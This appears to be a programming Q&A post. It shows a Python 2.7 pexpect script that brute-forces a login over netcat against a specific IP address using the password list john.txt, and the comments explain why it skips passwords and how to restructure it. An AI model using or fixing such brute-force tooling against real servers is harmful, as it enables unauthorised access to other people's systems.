# Pexpect Brute Force, Python 2.7

Tags: python, python-2.7, pexpect

I've written a program that connects to a server on port 80, the goal being to brute force the login to gain access to the files inside.

I'm using john.txt as my password list, I know this list contains the password I need. When I run the program, it starts to attempt different passwords, but it's only testing every 3rd password in the list.

Here's my code:

```
import pexpect

password_list = 'john.txt'
passwords = open(password_list)
child = pexpect.spawn('nc 83.212.97.72 80')

for x in passwords.readlines():
    ans = child.expect(['Login:', 'Password:', 'Login Incorrect', 'Too many failed attempts', 'Welcome max'])

    if ans == 0:
        child.sendline('max')

    elif ans == 1:
        child.sendline(x)
        print 'Attemping {}'.format(x)

    elif ans == 2:
        child = pexpect.spawn('nc 83.212.97.72 80')

    elif ans == 3:
        child = pexpect.spawn('nc 83.212.97.72 80')

    elif ans == 4:
        print 'Login completed, welcome max'
```

As far as I can tell, there's no Syntax errors in my code, does anyone know why the program is only testing every 3rd password in john.txt?

Comment: Not sure what the return values 0, 1, 2, 3 mean but it seems like you are not trying every line in your file. Just observe what happens if the ans == 0 : it goes to the next iteration without inputting the current line in the file.

Comment: You better define a function like `foo(ip, port, password)` which *spawn*s and *expect*s. Then write a *for* loop to iterate on the passwords.